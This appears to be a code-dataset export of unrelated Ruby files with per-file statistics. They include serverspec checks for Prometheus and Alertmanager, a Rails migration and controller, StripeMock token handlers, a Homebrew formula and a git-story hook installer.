      | awk '/bearer_token/ {print $2}')\" https://#{val_m}:#{kube_apiserver_secure_port}/api/v1/nodes/#{val_w}/proxy/metrics") do
        it "is expected to be equal" do
          expect(subject.stdout.to_i).to eq 200
        end
      end
    end
  end
end
# Tests for Alertmanager assuming monitoring.alerts.enable == true
# NOTE(review): readDataYaml is presumably a harness helper exposing the
# cluster configuration — confirm. The explicit `== true` means only a
# literal boolean true in the config enables these specs.
if readDataYaml["monitoring"]["alerts"]["enable"] == true

  describe 'Checking Alertmanager directories and files' do
    let(:disable_sudo) { false }

    describe file('/var/lib/prometheus/alertmanager') do
      it { should exist }
      it { should be_a_directory }
      it { should be_owned_by 'prometheus' }
      it { should be_grouped_into 'prometheus' }
    end

    describe file('/etc/prometheus/rules') do
      it { should exist }
      it { should be_a_directory }
      it { should be_owned_by 'root' }
      it { should be_grouped_into 'prometheus' }
    end

    describe file("/etc/prometheus/alertmanager.yml") do
      it { should exist }
      it { should be_a_file }
      it { should be_readable }
    end
  end

  describe 'Checking if Alertmanager service is enabled' do
    describe service('alertmanager') do
      it { should be_enabled }
    end
  end

  describe 'Validating Alertmanager rules' do
    describe command("/usr/local/bin/promtool check rules /etc/prometheus/rules/*") do
      let(:disable_sudo) { false }
      its(:stdout) { should_not match /FAILED/ }
      its(:exit_status) { should eq 0 }
    end
  end

  # End-to-end check: clone an existing rule into TEST_RULE, restart
  # Prometheus, verify the rule appears, then clean up and restart again.
  describe 'Checking if it is possible to create a rule checking if node is up' do
    describe command("cp -p /etc/prometheus/rules/UpDown.rules /etc/prometheus/rules/TEST_RULE.rules && sed -i 's/UpDown/TEST_RULE/g; s/down/up/g; s/== 0/== 1/g; \
    s/10s/1s/g' /etc/prometheus/rules/TEST_RULE.rules && systemctl restart prometheus") do
      let(:disable_sudo) { false }
      its(:exit_status) { should eq 0 }
    end
    describe command("for i in {1..10}; do if [ $(curl -o /dev/null -s -w '%{http_code}' #{prometheus_host}:#{prometheus_port}/graph) == 200 ]; \
    then curl -s #{prometheus_host}:#{prometheus_port}/rules | grep 'TEST_RULE'; break; else echo 'WAITING FOR PROMETHEUS TO BE STARTED'; sleep 1; fi; done;") do
      its(:stdout) { should match /TEST_RULE/ }
      its(:exit_status) { should eq 0 }
    end
    describe command("rm -rf /etc/prometheus/rules/TEST_RULE.rules && systemctl restart prometheus") do
      let(:disable_sudo) { false }
      its(:exit_status) { should eq 0 }
    end
    describe command("for i in {1..10}; do if [ $(curl -o /dev/null -s -w '%{http_code}' #{prometheus_host}:#{prometheus_port}/graph) == 200 ]; \
    then echo 'PROMETHEUS READY'; break; else echo 'WAITING FOR PROMETHEUS TO BE STARTED'; sleep 1; fi; done;") do
      its(:stdout) { should match /READY/ }
      its(:exit_status) { should eq 0 }
    end
  end

  # Tests for Alertmanager assuming monitoring.alerts.enable == true and monitoring.alerts.handlers.mail.enable == true
  if readDataYaml["monitoring"]["alerts"]["handlers"]["mail"]["enable"] == true

    describe 'Checking if the ports are open' do
      describe port(alertmanager_port) do
        let(:disable_sudo) { false }
        it { should be_listening }
      end
    end

    describe 'Checking if Alertmanager service is running' do
      describe service('alertmanager') do
        it { should be_running }
      end
    end

    describe 'Checking Alertmanager health' do
      describe command("curl -o /dev/null -s -w '%{http_code}' #{alertmanager_host}:#{alertmanager_port}") do
        it "is expected to be equal" do
          expect(subject.stdout.to_i).to eq 200
        end
      end
      describe command("curl #{alertmanager_host}:#{alertmanager_port}/-/ready") do
        its(:stdout) { should match /^OK$/ }
      end
      describe command("curl #{alertmanager_host}:#{alertmanager_port}/-/healthy") do
        its(:stdout) { should match /^OK$/ }
      end
      # Prometheus itself should report the Alertmanager as discovered.
      describe command("curl #{prometheus_host}:#{prometheus_port}/api/v1/alertmanagers") do
        its(:stdout_as_json) { should include('status' => 'success') }
      end
    end

    describe 'Checking if it is possible to send an alert' do
      describe command("curl -XPOST -d '[{\"labels\":{\"alertname\":\"TEST ALERT\", \"severity\":\"critical\"}}]' #{alertmanager_host}:#{alertmanager_port}/api/v1/alerts") do
        its(:stdout_as_json) { should include('status' => 'success') }
      end
    end
  end
end
| 39.160991 | 176 | 0.637046 |
1a3ca81fb1e24030d65dd172be1dd5d7b123b506 | 270 | class CreateAccounts < ActiveRecord::Migration
# Creates the accounts table.
# NOTE(review): the password is a plain string column here, which suggests
# no hashing at the schema level — verify how it is stored by the model.
def self.up
  create_table :accounts do |t|
    t.string :name
    t.string :url
    t.string :password
    t.text :comments

    t.timestamps
  end
end

# Rolls the migration back by dropping the table again.
def self.down
  drop_table :accounts
end
end
| 15.882353 | 46 | 0.640741 |
1a5257c9023c52ed9cf391e4298e82c47ec137cf | 81 | require 'test_helper'
# Auto-generated helper test stub for PasswordResetsHelper; no examples yet.
class PasswordResetsHelperTest < ActionView::TestCase
end
| 16.2 | 53 | 0.839506 |
18692df6497027edb8765778eddab592c955a7dc | 145 | require 'test_helper'
# Auto-generated integration test stub for OpportunitiesController; the
# scaffolded example is still commented out.
class OpportunitiesControllerTest < ActionDispatch::IntegrationTest
  # test "the truth" do
  #   assert true
  # end
end
| 18.125 | 67 | 0.751724 |
62a7d480f4de4a3571fa2ff8c3c5e41730f7eb59 | 1,402 | module Ci
# Legacy CI project endpoints kept for backwards compatibility with
# projects migrated from DoggoHub CI.
class ProjectsController < ::ApplicationController
  before_action :project
  before_action :no_cache, only: [:badge]
  before_action :authorize_read_project!, except: [:badge, :index]
  # The badge must be reachable without signing in (e.g. embedded in READMEs).
  skip_before_action :authenticate_user!, only: [:badge]
  protect_from_forgery

  def index
    redirect_to root_path
  end

  def show
    # Temporary compatibility with CI badges pointing to CI project page
    redirect_to namespace_project_path(project.namespace, project)
  end

  # Project status badge
  # Image with build status for sha or ref
  #
  # This action is DEPRECATED, this is here only for backwards compatibility
  # with projects migrated from DoggoHub CI.
  #
  def badge
    return render_404 unless @project

    image = Ci::ImageForBuildService.new.execute(@project, params)
    send_file image.path, filename: image.name, disposition: 'inline', type: "image/svg+xml"
  end

  protected

  # Looks the project up by its legacy CI id (not the regular project id).
  def project
    @project ||= Project.find_by(ci_id: params[:id].to_i)
  end

  # Badge responses must never be cached so the displayed status stays fresh.
  def no_cache
    response.headers["Cache-Control"] = "no-cache, no-store, max-age=0, must-revalidate"
    response.headers["Pragma"] = "no-cache"
    response.headers["Expires"] = "Fri, 01 Jan 1990 00:00:00 GMT"
  end

  def authorize_read_project!
    return access_denied! unless can?(current_user, :read_project, project)
  end
end
end
| 29.208333 | 94 | 0.693295 |
38fc42fde11e645c77ea8467bc295f337679b508 | 115 | json.array!(@notes) do |note|
json.extract! note, :id, :date, :text
json.url note_url(note, format: :json)
end
| 23 | 40 | 0.669565 |
28d76bbd714ab4392f348b6ed0d41750f5e60db3 | 2,001 | module StripeMock
module RequestHandlers
  # Mock implementations of Stripe's /v1/tokens endpoints.
  module Tokens

    # Register the routes this module serves when mixed into the handler.
    def Tokens.included(klass)
      klass.add_handler 'post /v1/tokens', :create_token
      klass.add_handler 'get /v1/tokens/(.*)', :get_token
    end

    # POST /v1/tokens — create a card token from either an existing
    # customer's card (optionally a specific source) or from raw card data.
    def create_token(route, method_url, params, headers)
      if params[:customer].nil? && params[:card].nil?
        raise Stripe::InvalidRequestError.new('You must supply either a card, customer, or bank account to create a token.', nil, 400)
      end

      cus_id = params[:customer]
      if cus_id && params[:source]
        customer = assert_existence :customer, cus_id, customers[cus_id]
        # params[:card] is an id; grab it from the db
        customer_card = get_card(customer, params[:source])
        assert_existence :card, params[:source], customer_card
      elsif params[:card]
        # params[:card] is a hash of cc info; "Sanitize" the card number
        params[:card][:fingerprint] = StripeMock::Util.fingerprint(params[:card][:number])
        params[:card][:last4] = params[:card][:number][-4,4]
        customer_card = params[:card]
      else
        # Customer given without an explicit source: use the default source.
        customer = assert_existence :customer, cus_id, customers[cus_id]
        customer_card = get_card(customer, customer[:default_source])
      end

      token_id = generate_card_token(customer_card)
      card = @card_tokens[token_id]

      Data.mock_token(params.merge :id => token_id, :card => card)
    end

    # GET /v1/tokens/:id — look the token up among bank and card tokens.
    def get_token(route, method_url, params, headers)
      route =~ method_url # populates $1 with the captured token id
      # A Stripe token can be either a bank token or a card token
      bank_or_card = @bank_tokens[$1] || @card_tokens[$1]
      assert_existence :token, $1, bank_or_card

      if bank_or_card[:object] == 'card'
        Data.mock_token(:id => $1, :card => bank_or_card)
      elsif bank_or_card[:object] == 'bank_account'
        Data.mock_token(:id => $1, :bank_account => bank_or_card)
      end
    end
  end
end
end
| 37.055556 | 136 | 0.626187 |
d5a1197b190b2fc9ac3befa93cca5c4fd6064fcd | 1,574 | class Libuninameslist < Formula
desc "Library of Unicode names and annotation data"
homepage "https://github.com/fontforge/libuninameslist"
url "https://github.com/fontforge/libuninameslist/releases/download/20200413/libuninameslist-dist-20200413.tar.gz"
sha256 "5c0283b2e18d101e58b70a026119d66c9d3e749e4537def7799bba0bc8998f62"
license "BSD-3-Clause"

bottle do
  sha256 cellar: :any, arm64_big_sur: "d4d445060083742dc4fc503fd105b8471dedb64797f0ed232d4e9f5de8e9f7f2"
  sha256 cellar: :any, big_sur:       "1eb14661a5be9d815bf273854935e0004392881a8946fb1e2470283d3938c036"
  sha256 cellar: :any, catalina:      "38e3ba23a50f2acdebdf4a6419b8e5d996650f9fd9c4e081eb18c77b57dc08ac"
  sha256 cellar: :any, mojave:        "5bbf66b5f23f99f833b95fae6462084c98838e79142e66a0e602ad7a70dc13f6"
  sha256 cellar: :any, high_sierra:   "9e6875ea89497fb8f3c8c4121f9142f7ca23f85a4d2ae8b3845d49db4194cf51"
end

# HEAD builds come from git and need the autotools toolchain to generate
# the configure script.
head do
  url "https://github.com/fontforge/libuninameslist.git"

  depends_on "autoconf" => :build
  depends_on "automake" => :build
  depends_on "libtool" => :build
end

# Release tarballs ship a ready configure script; HEAD builds regenerate
# the autotools files first.
def install
  if build.head?
    system "autoreconf", "-i"
    system "automake"
  end
  system "./configure", "--prefix=#{prefix}"
  system "make", "install"
end

# Compile and run a minimal program that links against the library.
test do
  (testpath/"test.c").write <<~EOS
    #include <uninameslist.h>
    int main() {
      (void)uniNamesList_blockCount();
      return 0;
    }
  EOS
  system ENV.cc, "test.c", "-I#{include}", "-L#{lib}", "-luninameslist", "-o", "test"
  system "./test"
end
end
| 33.489362 | 116 | 0.715375 |
91dbb1b8e9f476d0b089abd507a58f80279af102 | 2,551 | module Git::Story::Setup
include Git::Story::Utils
extend Git::Story::Utils

# Line used by install_hooks to recognise hook files installed by this gem;
# the shipped hook scripts presumably contain it — confirm against the
# bundled prepare-commit-msg/pre-push files.
MARKER = 'Installed by the git-story gem'

HOOKS_DIR = '.git/hooks'
PREPARE_COMMIT_MESSAGE_SRC = File.join(__dir__, 'prepare-commit-msg')
PREPARE_COMMIT_MESSAGE_DST = File.join(HOOKS_DIR, 'prepare-commit-msg')

# ERB template for config/story.yml; placeholders are filled from the
# environment when the rendered file is evaluated.
CONFIG_TEMPLATE = <<~end
  ---
  pivotal_token: <%= ENV['PIVOTAL_TOKEN'] %>
  pivotal_project: 123456789
  pivotal_reference_prefix: pivotal
  deploy_tag_prefix: production_deploy_
  semaphore_auth_token: <%= ENV['SEMAPHORE_AUTH_TOKEN'] %>
  semaphore_project_url: https://betterplace.semaphoreci.com/projects/betterplace
  todo_nudging: <%= ENV['TODO_NUDGING'].to_i == 1 %>
end

module_function
# Run the full setup: write the config template and install the git hooks.
# Requires an initialized git repository in the current directory.
#
# @param force [Boolean] overwrite existing files without asking
# @return [String, nil] a status message, or nil when no .git directory exists
def perform(force: false)
  if File.directory?('.git')
    install_config('config/story.yml', force: force)
    install_hooks(force: force)
    "Setup was performed."
  else
    puts "No directory .git found, you need an initialized git repo for this to work"
    nil
  end
end
# Install the hook scripts, prompting before overwriting files that were
# not created by this gem.
def install_hooks(force: false)
  for filename in %w[ prepare-commit-msg pre-push ]
    if path = file_installed?(filename)
      # Overwrite silently when forced, or when the existing file carries
      # our MARKER line (i.e. a previous install by this gem).
      if force || File.read(path).match?(MARKER)
        install_file filename
      else
        ask(
          prompt: "File #{path.inspect} not created by git-story."\
            " Overwrite? (y/n, default is %s) ",
          default: ?n,
        ) do |response|
          if response == ?y
            install_file filename
          end
        end
      end
    else
      install_file filename
    end
  end
end
# Path of an already-installed hook file, or nil when no such file exists
# under HOOKS_DIR yet.
def file_installed?(filename)
  candidate = File.join(HOOKS_DIR, filename)
  candidate if File.exist?(candidate)
end
# Copy one hook script shipped next to this file into .git/hooks, creating
# the directory first if needed. cp/mkdir_p presumably come from FileUtils
# via the included Utils mixin — confirm.
def install_file(filename)
  File.exist?(HOOKS_DIR) or mkdir_p(HOOKS_DIR)
  cp File.join(__dir__, filename), dest = File.join(HOOKS_DIR, filename)
  puts "#{filename.to_s.inspect} was installed to #{dest.to_s.inspect}."
end
# Write the story.yml config template to +filename+, asking before
# overwriting an existing file unless +force+ is given.
def install_config(filename, force: false)
  filename = File.expand_path(filename)
  if !force && File.exist?(filename)
    ask(
      prompt: "File #{filename.to_s.inspect} exists."\
        " Overwrite? (y/n, default is %s) ",
      default: ?n,
    ) do |response|
      if response != ?y
        puts "Skipping creation of #{filename.to_s.inspect}."
        return
      end
    end
  end
  mkdir_p File.dirname(filename)
  # File.secure_write is presumably a project extension to File — confirm.
  File.secure_write(filename) do |io|
    io.puts CONFIG_TEMPLATE
  end
  puts "#{filename.to_s.inspect} was created."
end
end
| 28.032967 | 87 | 0.633477 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.